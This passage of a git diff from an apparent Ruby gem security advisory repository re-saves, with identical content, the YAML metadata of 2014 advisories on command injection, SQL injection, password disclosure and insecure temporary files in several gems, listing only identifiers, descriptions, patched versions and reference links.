+    - http://www.vapid.dhs.org/advisories/kcapifony-2.1.6.html
+    - http://www.vapidlabs.com/advisory.php?v=65
+---
diff --git a/advisories/_posts/2014-06-30-CVE-2014-5002.md b/advisories/_posts/2014-06-30-CVE-2014-5002.md
index 2835a57a..93445635 100644
--- a/advisories/_posts/2014-06-30-CVE-2014-5002.md
+++ b/advisories/_posts/2014-06-30-CVE-2014-5002.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2014-5002 (lynx): lynx Gem for Ruby command/basic.rb Process Table Local
-  Plaintext Password Disclosure'
-comments: false
-categories:
-- lynx
-advisory:
-  gem: lynx
-  cve: 2014-5002
-  osvdb: 108580
-  ghsa: 94cq-7ccq-cmcm
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-5002
-  title: lynx Gem for Ruby command/basic.rb Process Table Local Plaintext Password
-    Disclosure
-  date: 2014-06-30
-  description: |
-    lynx Gem for Ruby contains a flaw in command/basic.rb that is due to
-    the application exposing password information in plaintext in the process table.
-    This may allow a local attacker to gain access to password information.
-  cvss_v3: 7.8
-  patched_versions:
-  - ">= 1.0.0"
----
+---
+layout: advisory
+title: 'CVE-2014-5002 (lynx): lynx Gem for Ruby command/basic.rb Process Table Local
+  Plaintext Password Disclosure'
+comments: false
+categories:
+- lynx
+advisory:
+  gem: lynx
+  cve: 2014-5002
+  osvdb: 108580
+  ghsa: 94cq-7ccq-cmcm
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-5002
+  title: lynx Gem for Ruby command/basic.rb Process Table Local Plaintext Password
+    Disclosure
+  date: 2014-06-30
+  description: |
+    lynx Gem for Ruby contains a flaw in command/basic.rb that is due to
+    the application exposing password information in plaintext in the process table.
+    This may allow a local attacker to gain access to password information.
+  cvss_v3: 7.8
+  patched_versions:
+  - ">= 1.0.0"
+---
diff --git a/advisories/_posts/2014-06-30-CVE-2014-5003.md b/advisories/_posts/2014-06-30-CVE-2014-5003.md
index 2177980d..9fa5c14f 100644
--- a/advisories/_posts/2014-06-30-CVE-2014-5003.md
+++ b/advisories/_posts/2014-06-30-CVE-2014-5003.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2014-5003 (ciborg): ciborg Gem for Ruby default.rb /tmp/perlbrew-installer
-  Local Symlink File Overwrite'
-comments: false
-categories:
-- ciborg
-advisory:
-  gem: ciborg
-  cve: 2014-5003
-  osvdb: 108586
-  ghsa: g982-9r8g-6qxw
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-5003
-  title: ciborg Gem for Ruby default.rb /tmp/perlbrew-installer Local Symlink File
-    Overwrite
-  date: 2014-06-30
-  description: |
-    ciborg Gem for Ruby contains a flaw as default.rb creates temporary files
-    insecurely. It is possible for a local attacker to use a symlink attack against
-    the /tmp/perlbrew-installer file to cause the program to unexpectedly overwrite
-    an arbitrary file.
-  cvss_v3: 5.5
----
+---
+layout: advisory
+title: 'CVE-2014-5003 (ciborg): ciborg Gem for Ruby default.rb /tmp/perlbrew-installer
+  Local Symlink File Overwrite'
+comments: false
+categories:
+- ciborg
+advisory:
+  gem: ciborg
+  cve: 2014-5003
+  osvdb: 108586
+  ghsa: g982-9r8g-6qxw
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-5003
+  title: ciborg Gem for Ruby default.rb /tmp/perlbrew-installer Local Symlink File
+    Overwrite
+  date: 2014-06-30
+  description: |
+    ciborg Gem for Ruby contains a flaw as default.rb creates temporary files
+    insecurely. It is possible for a local attacker to use a symlink attack against
+    the /tmp/perlbrew-installer file to cause the program to unexpectedly overwrite
+    an arbitrary file.
+  cvss_v3: 5.5
+---
diff --git a/advisories/_posts/2014-06-30-OSVDB-108530.md b/advisories/_posts/2014-06-30-OSVDB-108530.md
index 720f0594..24d96c71 100644
--- a/advisories/_posts/2014-06-30-OSVDB-108530.md
+++ b/advisories/_posts/2014-06-30-OSVDB-108530.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'OSVDB-108530 (kajam): kajam Gem for Ruby /dataset/lib/dataset/database/postgresql.rb
-  Metacharacter Handling Remote Command Execution'
-comments: false
-categories:
-- kajam
-advisory:
-  gem: kajam
-  osvdb: 108530
-  url: https://security.snyk.io/vuln/SNYK-RUBY-KAJAM-20171
-  title: kajam Gem for Ruby /dataset/lib/dataset/database/postgresql.rb Metacharacter
-    Handling Remote Command Execution
-  date: 2014-06-30
-  description: |
-    kajam Gem for Ruby contains a flaw in
-    /dataset/lib/dataset/database/postgresql.rb that is triggered
-    when handling metacharacters. This may allow a remote attacker
-    to execute arbitrary commands.
-  notes: Never patched
-  related:
-    url:
-    - https://security.snyk.io/vuln/SNYK-RUBY-KAJAM-20171
-    - https://my.diffend.io/gems/kajam/1.0.3.rc2
-    - http://osvdb.org/show/osvdb/108530
----
+---
+layout: advisory
+title: 'OSVDB-108530 (kajam): kajam Gem for Ruby /dataset/lib/dataset/database/postgresql.rb
+  Metacharacter Handling Remote Command Execution'
+comments: false
+categories:
+- kajam
+advisory:
+  gem: kajam
+  osvdb: 108530
+  url: https://security.snyk.io/vuln/SNYK-RUBY-KAJAM-20171
+  title: kajam Gem for Ruby /dataset/lib/dataset/database/postgresql.rb Metacharacter
+    Handling Remote Command Execution
+  date: 2014-06-30
+  description: |
+    kajam Gem for Ruby contains a flaw in
+    /dataset/lib/dataset/database/postgresql.rb that is triggered
+    when handling metacharacters. This may allow a remote attacker
+    to execute arbitrary commands.
+  notes: Never patched
+  related:
+    url:
+    - https://security.snyk.io/vuln/SNYK-RUBY-KAJAM-20171
+    - https://my.diffend.io/gems/kajam/1.0.3.rc2
+    - http://osvdb.org/show/osvdb/108530
+---
diff --git a/advisories/_posts/2014-06-30-OSVDB-108570.md b/advisories/_posts/2014-06-30-OSVDB-108570.md
index e661ba40..1f61d252 100644
--- a/advisories/_posts/2014-06-30-OSVDB-108570.md
+++ b/advisories/_posts/2014-06-30-OSVDB-108570.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'OSVDB-108570 (backup_checksum): backup_checksum Gem for Ruby /lib/backup/cli/utility.rb
-  Metacharacter Handling Remote Command Execution'
-comments: false
-categories:
-- backup_checksum
-advisory:
-  gem: backup_checksum
-  osvdb: 108570
-  url: https://www.openwall.com/lists/oss-security/2014/07/07/12
-  title: backup_checksum Gem for Ruby /lib/backup/cli/utility.rb Metacharacter Handling
-    Remote Command Execution
-  date: 2014-06-30
-  description: |
-    backup_checksum Gem for Ruby contains a flaw in /lib/backup/cli/utility.rb
-    that is triggered when handling metacharacters. This may allow a remote
-    attacker to execute arbitrary commands.
-  notes: Never patched
-  related:
-    url:
-    - https://www.openwall.com/lists/oss-security/2014/07/07/12
-    - https://my.diffend.io/gems/backup_checksum/3.0.23
-    - https://github.com/backup/backup
-    - http://osvdb.org/show/osvdb/108570
----
+---
+layout: advisory
+title: 'OSVDB-108570 (backup_checksum): backup_checksum Gem for Ruby /lib/backup/cli/utility.rb
+  Metacharacter Handling Remote Command Execution'
+comments: false
+categories:
+- backup_checksum
+advisory:
+  gem: backup_checksum
+  osvdb: 108570
+  url: https://www.openwall.com/lists/oss-security/2014/07/07/12
+  title: backup_checksum Gem for Ruby /lib/backup/cli/utility.rb Metacharacter Handling
+    Remote Command Execution
+  date: 2014-06-30
+  description: |
+    backup_checksum Gem for Ruby contains a flaw in /lib/backup/cli/utility.rb
+    that is triggered when handling metacharacters. This may allow a remote
+    attacker to execute arbitrary commands.
+  notes: Never patched
+  related:
+    url:
+    - https://www.openwall.com/lists/oss-security/2014/07/07/12
+    - https://my.diffend.io/gems/backup_checksum/3.0.23
+    - https://github.com/backup/backup
+    - http://osvdb.org/show/osvdb/108570
+---
diff --git a/advisories/_posts/2014-06-30-OSVDB-108572.md b/advisories/_posts/2014-06-30-OSVDB-108572.md
index 28f231f9..16846db4 100644
--- a/advisories/_posts/2014-06-30-OSVDB-108572.md
+++ b/advisories/_posts/2014-06-30-OSVDB-108572.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'OSVDB-108572 (kcapifony): kcapifony Gem for Ruby /lib/ksymfony1.rb Metacharacter
-  Handling Remote Command Execution'
-comments: false
-categories:
-- kcapifony
-advisory:
-  gem: kcapifony
-  osvdb: 108572
-  url: https://www.mend.io/vulnerability-database/WS-2014-0019
-  title: kcapifony Gem for Ruby /lib/ksymfony1.rb Metacharacter Handling Remote Command
-    Execution
-  date: 2014-06-30
-  description: |
-    kcapifony Gem for Ruby contains a flaw in /lib/ksymfony1.rb that
-    is triggered when handling metacharacters. This may allow a remote
-    attacker to execute arbitrary commands.
-  notes: Never patched
-  related:
-    url:
-    - https://www.mend.io/vulnerability-database/WS-2014-0019
-    - https://github.com/Kunstmaan/kCapifony/blob/master/lib/ksymfony1.rb
-    - http://www.vapid.dhs.org/advisories/kcapifony-2.1.6.html
-    - http://www.vapidlabs.com/advisory.php?v=65
-    - http://osvdb.org/show/osvdb/108572
----
+---
+layout: advisory
+title: 'OSVDB-108572 (kcapifony): kcapifony Gem for Ruby /lib/ksymfony1.rb Metacharacter
+  Handling Remote Command Execution'
+comments: false
+categories:
+- kcapifony
+advisory:
+  gem: kcapifony
+  osvdb: 108572
+  url: https://www.mend.io/vulnerability-database/WS-2014-0019
+  title: kcapifony Gem for Ruby /lib/ksymfony1.rb Metacharacter Handling Remote Command
+    Execution
+  date: 2014-06-30
+  description: |
+    kcapifony Gem for Ruby contains a flaw in /lib/ksymfony1.rb that
+    is triggered when handling metacharacters. This may allow a remote
+    attacker to execute arbitrary commands.
+  notes: Never patched
+  related:
+    url:
+    - https://www.mend.io/vulnerability-database/WS-2014-0019
+    - https://github.com/Kunstmaan/kCapifony/blob/master/lib/ksymfony1.rb
+    - http://www.vapid.dhs.org/advisories/kcapifony-2.1.6.html
+    - http://www.vapidlabs.com/advisory.php?v=65
+    - http://osvdb.org/show/osvdb/108572
+---
diff --git a/advisories/_posts/2014-06-30-OSVDB-108575.md b/advisories/_posts/2014-06-30-OSVDB-108575.md
index 091fb562..8c53f954 100644
--- a/advisories/_posts/2014-06-30-OSVDB-108575.md
+++ b/advisories/_posts/2014-06-30-OSVDB-108575.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'OSVDB-108575 (cap-strap): cap-strap Gem for Ruby Hardcoded Password Crypt
-  Hash Salt Weakness'
-comments: false
-categories:
-- cap-strap
-advisory:
-  gem: cap-strap
-  osvdb: 108575
-  url: https://www.openwall.com/lists/oss-security/2014/07/07/9
-  title: cap-strap Gem for Ruby Hardcoded Password Crypt Hash Salt Weakness
-  date: 2014-06-30
-  description: |
-    cap-strap Gem for Ruby contains a flaw that is due to the application
-    using a hardcoded default 'sa' salt for password encryption. This may
-    allow a local attacker to more easily decrypt passwords.
-  notes: Never patched
-  related:
-    url:
-    - https://www.openwall.com/lists/oss-security/2014/07/07/9
-    - https://github.com/substantial/cap-strap
-    - http://www.vapid.dhs.org/advisories/cap-strap-0.1.5.html
-    - http://www.vapidlabs.com/advisory.php?v=27
-    - http://osvdb.org/show/osvdb/108575
----
+---
+layout: advisory
+title: 'OSVDB-108575 (cap-strap): cap-strap Gem for Ruby Hardcoded Password Crypt
+  Hash Salt Weakness'
+comments: false
+categories:
+- cap-strap
+advisory:
+  gem: cap-strap
+  osvdb: 108575
+  url: https://www.openwall.com/lists/oss-security/2014/07/07/9
+  title: cap-strap Gem for Ruby Hardcoded Password Crypt Hash Salt Weakness
+  date: 2014-06-30
+  description: |
+    cap-strap Gem for Ruby contains a flaw that is due to the application
+    using a hardcoded default 'sa' salt for password encryption. This may
+    allow a local attacker to more easily decrypt passwords.
+  notes: Never patched
+  related:
+    url:
+    - https://www.openwall.com/lists/oss-security/2014/07/07/9
+    - https://github.com/substantial/cap-strap
+    - http://www.vapid.dhs.org/advisories/cap-strap-0.1.5.html
+    - http://www.vapidlabs.com/advisory.php?v=27
+    - http://osvdb.org/show/osvdb/108575
+---
diff --git a/advisories/_posts/2014-06-30-OSVDB-108579.md b/advisories/_posts/2014-06-30-OSVDB-108579.md
index a89fd571..8388d45f 100644
--- a/advisories/_posts/2014-06-30-OSVDB-108579.md
+++ b/advisories/_posts/2014-06-30-OSVDB-108579.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'OSVDB-108579 (lynx): lynx Gem for Ruby lib/lynx/pipe/run.rb Remote Command
-  Execution'
-comments: false
-categories:
-- lynx
-advisory:
-  gem: lynx
-  osvdb: 108579
-  url: https://www.openwall.com/lists/oss-security/2014/07/07/23
-  title: lynx Gem for Ruby lib/lynx/pipe/run.rb Remote Command Execution
-  date: 2014-06-30
-  description: |
-    lynx Gem for Ruby contains a flaw in lib/lynx/pipe/run.rb that
-    may allow a remote attacker to execute arbitrary commands.
-  notes: Never patched
-  related:
-    url:
-    - https://www.openwall.com/lists/oss-security/2014/07/07/23
-    - https://security.snyk.io/vuln/SNYK-RUBY-LYNX-20160
-    - https://github.com/panthomakos/lynx/blob/master/lib/lynx/pipe/run.rb
-    - http://osvdb.org/show/osvdb/108579
----
+---
+layout: advisory
+title: 'OSVDB-108579 (lynx): lynx Gem for Ruby lib/lynx/pipe/run.rb Remote Command
+  Execution'
+comments: false
+categories:
+- lynx
+advisory:
+  gem: lynx
+  osvdb: 108579
+  url: https://www.openwall.com/lists/oss-security/2014/07/07/23
+  title: lynx Gem for Ruby lib/lynx/pipe/run.rb Remote Command Execution
+  date: 2014-06-30
+  description: |
+    lynx Gem for Ruby contains a flaw in lib/lynx/pipe/run.rb that
+    may allow a remote attacker to execute arbitrary commands.
+  notes: Never patched
+  related:
+    url:
+    - https://www.openwall.com/lists/oss-security/2014/07/07/23
+    - https://security.snyk.io/vuln/SNYK-RUBY-LYNX-20160
+    - https://github.com/panthomakos/lynx/blob/master/lib/lynx/pipe/run.rb
+    - http://osvdb.org/show/osvdb/108579
+---
diff --git a/advisories/_posts/2014-06-30-OSVDB-108585.md b/advisories/_posts/2014-06-30-OSVDB-108585.md
index d9de9ee1..8c482081 100644
--- a/advisories/_posts/2014-06-30-OSVDB-108585.md
+++ b/advisories/_posts/2014-06-30-OSVDB-108585.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'OSVDB-108585 (lingq): lingq Gem for Ruby client.rb Metacharacter Handling
-  Remote Command Execution'
-comments: false
-categories:
-- lingq
-advisory:
-  gem: lingq
-  osvdb: 108585
-  url: https://www.versioneye.com/Ruby/lingq/0.3.1
-  title: lingq Gem for Ruby client.rb Metacharacter Handling Remote Command Execution
-  date: 2014-06-30
-  description: |
-    lingq Gem for Ruby contains a flaw in client.rb that is triggered
-    when handling metacharacters. This may allow a remote attacker
-    to execute arbitrary commands.
-  notes: Never patched
-  related:
-    url:
-    - https://www.versioneye.com/Ruby/lingq/0.3.1
-    - http://www.vapid.dhs.org/advisories/lingq-0.3.1.html
-    - http://www.vapidlabs.com/advisory.php?v=71
-    - http://osvdb.org/show/osvdb/108585
----
+---
+layout: advisory
+title: 'OSVDB-108585 (lingq): lingq Gem for Ruby client.rb Metacharacter Handling
+  Remote Command Execution'
+comments: false
+categories:
+- lingq
+advisory:
+  gem: lingq
+  osvdb: 108585
+  url: https://www.versioneye.com/Ruby/lingq/0.3.1
+  title: lingq Gem for Ruby client.rb Metacharacter Handling Remote Command Execution
+  date: 2014-06-30
+  description: |
+    lingq Gem for Ruby contains a flaw in client.rb that is triggered
+    when handling metacharacters. This may allow a remote attacker
+    to execute arbitrary commands.
+  notes: Never patched
+  related:
+    url:
+    - https://www.versioneye.com/Ruby/lingq/0.3.1
+    - http://www.vapid.dhs.org/advisories/lingq-0.3.1.html
+    - http://www.vapidlabs.com/advisory.php?v=71
+    - http://osvdb.org/show/osvdb/108585
+---
diff --git a/advisories/_posts/2014-06-30-OSVDB-108593.md b/advisories/_posts/2014-06-30-OSVDB-108593.md
index dfd4d873..36ac3daf 100644
--- a/advisories/_posts/2014-06-30-OSVDB-108593.md
+++ b/advisories/_posts/2014-06-30-OSVDB-108593.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'OSVDB-108593 (kompanee-recipes): kompanee-recipes Gem for Ruby /lib/kompanee-recipes/heroku.rb
-  Multiple Variable Handling Remote Command Execution Weakness'
-comments: false
-categories:
-- kompanee-recipes
-advisory:
-  gem: kompanee-recipes
-  osvdb: 108593
-  url: https://www.openwall.com/lists/oss-security/2014/07/07/17
-  title: kompanee-recipes Gem for Ruby /lib/kompanee-recipes/heroku.rb Multiple Variable
-    Handling Remote Command Execution Weakness
-  date: 2014-06-30
-  description: |
-    kompanee-recipes Gem for Ruby contains a flaw in
-    /lib/kompanee-recipes/heroku.rb that is triggered when handling shell
-    metacharacters passed via the 'password', 'user', 'deploy_name', and
-    'application' variables. This may allow a remote attacker to execute
-    arbitrary commands.
-  notes: Never patched
-  related:
-    url:
-    - https://www.openwall.com/lists/oss-security/2014/07/07/17
-    - https://seclists.org/oss-sec/2014/q3/162
-    - https://www.mend.io/vulnerability-database/WS-2014-0025
-    - https://security.snyk.io/vuln/SNYK-RUBY-KOMPANEERECIPES-20177
-    - http://www.vapid.dhs.org/advisories/kompanee-recipes-0.1.4.html
-    - http://www.vapidlabs.com/advisory.php?v=67
-    - http://osvdb.org/show/osvdb/108593
----
+---
+layout: advisory
+title: 'OSVDB-108593 (kompanee-recipes): kompanee-recipes Gem for Ruby /lib/kompanee-recipes/heroku.rb
+  Multiple Variable Handling Remote Command Execution Weakness'
+comments: false
+categories:
+- kompanee-recipes
+advisory:
+  gem: kompanee-recipes
+  osvdb: 108593
+  url: https://www.openwall.com/lists/oss-security/2014/07/07/17
+  title: kompanee-recipes Gem for Ruby /lib/kompanee-recipes/heroku.rb Multiple Variable
+    Handling Remote Command Execution Weakness
+  date: 2014-06-30
+  description: |
+    kompanee-recipes Gem for Ruby contains a flaw in
+    /lib/kompanee-recipes/heroku.rb that is triggered when handling shell
+    metacharacters passed via the 'password', 'user', 'deploy_name', and
+    'application' variables. This may allow a remote attacker to execute
+    arbitrary commands.
+  notes: Never patched
+  related:
+    url:
+    - https://www.openwall.com/lists/oss-security/2014/07/07/17
+    - https://seclists.org/oss-sec/2014/q3/162
+    - https://www.mend.io/vulnerability-database/WS-2014-0025
+    - https://security.snyk.io/vuln/SNYK-RUBY-KOMPANEERECIPES-20177
+    - http://www.vapid.dhs.org/advisories/kompanee-recipes-0.1.4.html
+    - http://www.vapidlabs.com/advisory.php?v=67
+    - http://osvdb.org/show/osvdb/108593
+---
diff --git a/advisories/_posts/2014-06-30-OSVDB-108594.md b/advisories/_posts/2014-06-30-OSVDB-108594.md
index 44ec6e6a..465bcc76 100644
--- a/advisories/_posts/2014-06-30-OSVDB-108594.md
+++ b/advisories/_posts/2014-06-30-OSVDB-108594.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'OSVDB-108594 (gnms): gnms Gem for Ruby /lib/cmd_parse.rb ip Variable Shell
-  Metacharacter Handling Remote Command Injection'
-comments: false
-categories:
-- gnms
-advisory:
-  gem: gnms
-  osvdb: 108594
-  url: http://www.vapidlabs.com/advisories/gnms-2.1.1.html
-  title: gnms Gem for Ruby /lib/cmd_parse.rb ip Variable Shell Metacharacter Handling
-    Remote Command Injection
-  date: 2014-06-30
-  description: |
-    gnms Gem for Ruby contains a flaw in /lib/cmd_parse.rb that is triggered
-    when handling shell metacharacters passed via the 'ip' variable.
-    This may allow a remote attacker to inject arbitrary commands.
-  notes: Never patched
-  related:
-    url:
-    - http://www.vapidlabs.com/advisories/gnms-2.1.1.html
-    - http://www.vapidlabs.com/advisory.php?v=55
-    - http://osvdb.org/show/osvdb/108594
----
+---
+layout: advisory
+title: 'OSVDB-108594 (gnms): gnms Gem for Ruby /lib/cmd_parse.rb ip Variable Shell
+  Metacharacter Handling Remote Command Injection'
+comments: false
+categories:
+- gnms
+advisory:
+  gem: gnms
+  osvdb: 108594
+  url: http://www.vapidlabs.com/advisories/gnms-2.1.1.html
+  title: gnms Gem for Ruby /lib/cmd_parse.rb ip Variable Shell Metacharacter Handling
+    Remote Command Injection
+  date: 2014-06-30
+  description: |
+    gnms Gem for Ruby contains a flaw in /lib/cmd_parse.rb that is triggered
+    when handling shell metacharacters passed via the 'ip' variable.
+    This may allow a remote attacker to inject arbitrary commands.
+  notes: Never patched
+  related:
+    url:
+    - http://www.vapidlabs.com/advisories/gnms-2.1.1.html
+    - http://www.vapidlabs.com/advisory.php?v=55
+    - http://osvdb.org/show/osvdb/108594
+---
diff --git a/advisories/_posts/2014-07-02-CVE-2014-3482.md b/advisories/_posts/2014-07-02-CVE-2014-3482.md
index 56e696b4..f9da9962 100644
--- a/advisories/_posts/2014-07-02-CVE-2014-3482.md
+++ b/advisories/_posts/2014-07-02-CVE-2014-3482.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2014-3482 (activerecord): CVE-2014-3482 rubygem-activerecord: SQL injection
-  vulnerability in ''bitstring'' quoting'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2014-3482
-  osvdb: 108664
-  ghsa: mhwp-qhpc-h3jm
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-3482
-  title: 'CVE-2014-3482 rubygem-activerecord: SQL injection vulnerability in ''bitstring''
-    quoting'
-  date: 2014-07-02
-  description: |
-    SQL injection vulnerability in activerecord/lib/active_record/connection_adapters/postgresql_adapter.rb
-    in the PostgreSQL adapter for Active Record in Ruby on Rails 2.x and 3.x before
-    3.2.19 allows remote attackers to execute arbitrary SQL commands by leveraging improper
-    bitstring quoting. It was discovered that Active Record did not properly quote values
-    of the bitstring type attributes when using the PostgreSQL database adapter. A remote
-    attacker could possibly use this flaw to conduct an SQL injection attack against
-    applications using Active Record.
-  unaffected_versions:
-  - ">= 4.0.0"
-  patched_versions:
-  - "~> 3.2.19"
----
+---
+layout: advisory
+title: 'CVE-2014-3482 (activerecord): CVE-2014-3482 rubygem-activerecord: SQL injection
+  vulnerability in ''bitstring'' quoting'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2014-3482
+  osvdb: 108664
+  ghsa: mhwp-qhpc-h3jm
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-3482
+  title: 'CVE-2014-3482 rubygem-activerecord: SQL injection vulnerability in ''bitstring''
+    quoting'
+  date: 2014-07-02
+  description: |
+    SQL injection vulnerability in activerecord/lib/active_record/connection_adapters/postgresql_adapter.rb
+    in the PostgreSQL adapter for Active Record in Ruby on Rails 2.x and 3.x before
+    3.2.19 allows remote attackers to execute arbitrary SQL commands by leveraging improper
+    bitstring quoting. It was discovered that Active Record did not properly quote values
+    of the bitstring type attributes when using the PostgreSQL database adapter. A remote
+    attacker could possibly use this flaw to conduct an SQL injection attack against
+    applications using Active Record.
+  unaffected_versions:
+  - ">= 4.0.0"
+  patched_versions:
+  - "~> 3.2.19"
+---
diff --git a/advisories/_posts/2014-07-02-CVE-2014-3483.md b/advisories/_posts/2014-07-02-CVE-2014-3483.md
index 698c457d..ac9d0efa 100644
--- a/advisories/_posts/2014-07-02-CVE-2014-3483.md
+++ b/advisories/_posts/2014-07-02-CVE-2014-3483.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2014-3483 (activerecord): CVE-2014-3483 rubygem-activerecord: SQL injection
-  vulnerability in ''range'' quoting'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2014-3483
-  osvdb: 108665
-  ghsa: r8fh-hq2p-7qhq
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-3483
-  title: 'CVE-2014-3483 rubygem-activerecord: SQL injection vulnerability in ''range''
-    quoting'
-  date: 2014-07-02
-  description: |
-    SQL injection vulnerability in activerecord/lib/active_record/connection_adapters/postgresql/quoting.rb
-    in the PostgreSQL adapter for Active Record in Ruby on Rails 4.x before 4.0.7 and
-    4.1.x before 4.1.3 allows remote attackers to execute arbitrary SQL commands by
-    leveraging improper range quoting. It was discovered that Active Record did not
-    properly quote values of the range type attributes when using the PostgreSQL database
-    adapter. A remote attacker could possibly use this flaw to conduct an SQL injection
-    attack against applications using Active Record.
-  unaffected_versions:
-  - "< 4.0.0"
-  patched_versions:
-  - "~> 4.0.7"
-  - ">= 4.1.3"
----
+---
+layout: advisory
+title: 'CVE-2014-3483 (activerecord): CVE-2014-3483 rubygem-activerecord: SQL injection
+  vulnerability in ''range'' quoting'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2014-3483
+  osvdb: 108665
+  ghsa: r8fh-hq2p-7qhq
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-3483
+  title: 'CVE-2014-3483 rubygem-activerecord: SQL injection vulnerability in ''range''
+    quoting'
+  date: 2014-07-02
+  description: |
+    SQL injection vulnerability in activerecord/lib/active_record/connection_adapters/postgresql/quoting.rb
+    in the PostgreSQL adapter for Active Record in Ruby on Rails 4.x before 4.0.7 and
+    4.1.x before 4.1.3 allows remote attackers to execute arbitrary SQL commands by
+    leveraging improper range quoting. It was discovered that Active Record did not
+    properly quote values of the range type attributes when using the PostgreSQL database
+    adapter. A remote attacker could possibly use this flaw to conduct an SQL injection
+    attack against applications using Active Record.
+  unaffected_versions:
+  - "< 4.0.0"
+  patched_versions:
+  - "~> 4.0.7"
+  - ">= 4.1.3"
+---
diff --git a/advisories/_posts/2014-07-09-CVE-2014-5004.md b/advisories/_posts/2014-07-09-CVE-2014-5004.md
index 15d6356b..58d4a0ab 100644
--- a/advisories/_posts/2014-07-09-CVE-2014-5004.md
+++ b/advisories/_posts/2014-07-09-CVE-2014-5004.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2014-5004 (brbackup): brbackup Gem for Ruby Process List Local Plaintext
-  Password Disclosure'
-comments: false
-categories:
-- brbackup
-advisory:
-  gem: brbackup
-  cve: 2014-5004
-  osvdb: 108901
-  ghsa: vqcm-7f7f-r539
-  url: http://www.vapid.dhs.org/advisories/brbackup-0.1.1.html
-  title: brbackup Gem for Ruby Process List Local Plaintext Password Disclosure
-  date: 2014-07-09
-  description: |
-    brbackup Gem for Ruby contains a flaw that is due to the program exposing
-    password information in plaintext in the process list. This may allow a
-    local attacker to gain access to password information.
-  cvss_v2: 2.1
-  cvss_v3: 7.8
-  notes: Never patched
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2014-5004
-    - http://www.vapid.dhs.org/advisories/brbackup-0.1.1.html
-    - http://www.vapidlabs.com/advisory.php?v=25
-    - http://www.openwall.com/lists/oss-security/2014/07/10/6
-    - http://www.openwall.com/lists/oss-security/2014/07/17/5
-    - http://www.securityfocus.com/bid/68506
-    - https://web.archive.org/web/20200229055655/https://www.securityfocus.com/bid/68506/
----
+---
+layout: advisory
+title: 'CVE-2014-5004 (brbackup): brbackup Gem for Ruby Process List Local Plaintext
+  Password Disclosure'
+comments: false
+categories:
+- brbackup
+advisory:
+  gem: brbackup
+  cve: 2014-5004
+  osvdb: 108901
+  ghsa: vqcm-7f7f-r539
+  url: http://www.vapid.dhs.org/advisories/brbackup-0.1.1.html
+  title: brbackup Gem for Ruby Process List Local Plaintext Password Disclosure
+  date: 2014-07-09
+  description: |
+    brbackup Gem for Ruby contains a flaw that is due to the program exposing
+    password information in plaintext in the process list. This may allow a
+    local attacker to gain access to password information.
+  cvss_v2: 2.1
+  cvss_v3: 7.8
+  notes: Never patched
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-5004
+    - http://www.vapid.dhs.org/advisories/brbackup-0.1.1.html
+    - http://www.vapidlabs.com/advisory.php?v=25
+    - http://www.openwall.com/lists/oss-security/2014/07/10/6
+    - http://www.openwall.com/lists/oss-security/2014/07/17/5
+    - http://www.securityfocus.com/bid/68506
+    - https://web.archive.org/web/20200229055655/https://www.securityfocus.com/bid/68506/
+---
diff --git a/advisories/_posts/2014-07-09-OSVDB-108899.md b/advisories/_posts/2014-07-09-OSVDB-108899.md
index 2eb2060b..df605a6f 100644
--- a/advisories/_posts/2014-07-09-OSVDB-108899.md
+++ b/advisories/_posts/2014-07-09-OSVDB-108899.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'OSVDB-108899 (brbackup): brbackup Gem for Ruby /lib/brbackup.rb name Parameter
-  SQL Injection'
-comments: false
-categories:
-- brbackup
-advisory:
-  gem: brbackup
-  osvdb: 108899
-  url: https://www.openwall.com/lists/oss-security/2014/07/10/6
-  title: brbackup Gem for Ruby /lib/brbackup.rb name Parameter SQL Injection
-  date: 2014-07-09
-  description: |
-    brbackup Gem for Ruby contains a flaw that may allow carrying out an SQL
-    injection attack. The issue is due to the /lib/brbackup.rb script not
-    properly sanitizing user-supplied input to the 'name' parameter. This may
-    allow a remote attacker to inject or manipulate SQL queries in the back-end
-    database, allowing for the manipulation or disclosure of arbitrary data.
-  notes: Never patched
-  related:
-    url:
-    - https://www.openwall.com/lists/oss-security/2014/07/10/6
-    - https://raw.githubusercontent.com/codesake/codesake-dawn/master/Roadmap.md
-    - https://github.com/tongueroo/brbackup/blob/master/lib/brbackup.rb
-    - http://www.vapid.dhs.org/advisories/brbackup-0.1.1.html
-    - http://www.vapidlabs.com/advisory.php?v=25
-    - http://osvdb.org/show/osvdb/108899
----
+---
+layout: advisory
+title: 'OSVDB-108899 (brbackup): brbackup Gem for Ruby /lib/brbackup.rb name Parameter
+  SQL Injection'
+comments: false
+categories:
+- brbackup
+advisory:
+  gem: brbackup
+  osvdb: 108899
+  url: https://www.openwall.com/lists/oss-security/2014/07/10/6
+  title: brbackup Gem for Ruby /lib/brbackup.rb name Parameter SQL Injection
+  date: 2014-07-09
